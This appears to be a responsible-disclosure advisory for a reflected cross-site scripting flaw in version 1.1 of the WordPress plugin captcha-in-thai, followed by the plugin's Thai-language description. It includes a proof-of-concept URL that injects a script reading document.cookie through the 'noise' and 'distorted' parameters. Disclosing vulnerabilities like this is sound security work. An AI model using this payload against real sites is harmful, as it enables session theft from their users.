wp-plugin : captcha-in-thai – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : captcha-in-thai

 

Effected Version : 1.1 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 
http://localhost/wp-content/plugins/captcha-in-thai/image.php?noise=noise'><script>alert(document.cookie)</script>&font_size=1&distorted=a'><script>alert(document.cookie)</script>&font_color=1&bg_color=1

 

Vulnerable Parameter : noise, distorted

 

Type of XSS : Reflected

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-04

 
Plugin Status : Updated on 2014-01-11
 
Public Disclosure : July 7, 2014
 
CVE Number : Not assigned yet

 
Plugin Description :
 
CAPTCHA in Thai เป็นการบริการฟรีแคปต์ชา ที่เป็นภาษาไทย ในลักษณะของการแก้ไขคำที่มักเขียนผิด คำอ่าน และสุภาษิตต่างๆ
เพื่อช่วยป้องกันเว็บไซต์ของท่านจากสแปม ท่านสามารถติดตั้งใช้ได้หลายส่วน ได้แก่ การเข้าสู่ระบบ, การลงทะเบียนและการแสดงความคิดเห็น
นอกจากนี้การใช้ CAPTCHA in Thai เป็นการส่งเสริมให้ผู้ใช้งานสามารถใช้ภาษาไทยได้ถูกต้องอีกด้วย

= การทำงาน =
1. เมื่อผู้ใช้เข้าหน้าที่ถูกตั้งค่าให้ใช้งานแคปต์ชา จะมีการร้องขอภาพคำถามจาก server โดยมีการส่ง ip address
ของผู้ที่ต้องตอบแคปต์ชา และ hostname ที่ติดตั้งปลั๊กอิน เพื่อใช้ในการเก็บสถิติไปด้วย
2. เมื่อผู้ใช้ ทำการกรอกข้อมูลในหน้านั้นๆ พร้อมกับคำตอบของแคปต์ชา ปลั๊กอินจะส่งคำตอบกลับไปตรวจสอบที่เซิฟเวอร์
พร้อม ip address ของผู้ตอบ และชื่อ hostname ที่ติดตั้งปลั๊กอิน จากนั้นเซิฟเวอร์จะทำการส่งข้อมูลว่าถูกหรือผิดกลับมา

= ปลั๊กอินนี้จะช่วยอะไรคุณได้บ้าง: =

* ช่วยให้เว็บของคุณมีการป้องกันสแปมผ่านแคปต์ชา ในรูปแบบภาษาไทย
* สามารถเลือกการใช้บริการได้หลากหลายรูปแบบ ได้แก่ คำที่มักเขียนผิด คำอ่าน และสุภาษิต และเรียกใช้ได้หลายส่วนการทำงาน
* สามารถเลือกสีของตัวอักษร, สีของพื้นหลัง, รูปแบบของตัวอักษรได้
* สามารถเลือกเลือกระดับของการป้องกันได้
* มีระบบ Offline ป้องกันในกรณีที่ไม่สามารถติดต่อกับเซิร์ฟเวอร์ของเราได้

= Credit =
* การจัดทำปลั๊กอินแคปต์ชาในภาษาไทย เป็นส่วนหนึ่งของการทำโครงงานในวิชา CN405 COMPUTER ENGINEERING PROJECT II คณะวิศวกรรมศาสตร์ ภาควิชาไฟฟ้าและคอมพิวเตอร์ มหาวิทยาลัยธรรมศาสตร์ โดยมีอาจารย์ วชิรา พรหมสาขา ณ สกลนคร เป็นอาจารย์ที่ปรึกษา
* Source code ของ Color Picker จาก  jscolor.com
* ปลั๊กอิน captcha ที่นำมาศึกษา ของ BestWebSoft

Leave a Reply

Your email address will not be published. Required fields are marked *